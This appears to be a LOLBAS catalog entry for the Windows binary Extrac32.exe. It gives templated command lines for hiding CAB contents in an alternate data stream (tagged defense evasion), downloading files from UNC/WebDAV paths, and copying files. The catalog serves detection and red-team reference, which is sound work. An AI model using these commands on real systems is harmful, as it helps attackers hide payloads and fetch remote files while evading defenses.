Catalog LOLBAS

LOL · Binary

Extrac32.exe

4 techniques WindowsLOLBAS GPL-3.0

ADS

Defense EvasionFile Write Windows

Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.

Use Extract data from cab file and hide it in an alternate data stream.

extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe
Context
user
Native
ADS

ADS

Defense EvasionFile Write Windows

Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.

Use Extract data from cab file and hide it in an alternate data stream.

extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe
Context
user
Native
ADS

Download

File Download Windows

Copy the source file to the destination file and overwrite it.

Use Download file from UNC/WEBDav

extrac32 /Y /C {PATH_SMB} {PATH_ABSOLUTE}
Context
user
Native
Download
MITRE
T1105

Copy

File Copy Windows

Command for copying file from one folder to another

Use Copy file

extrac32.exe /C {PATH_ABSOLUTE:.source.exe} {PATH_ABSOLUTE:.dest.exe}
Context
user
Native
Copy
MITRE
T1105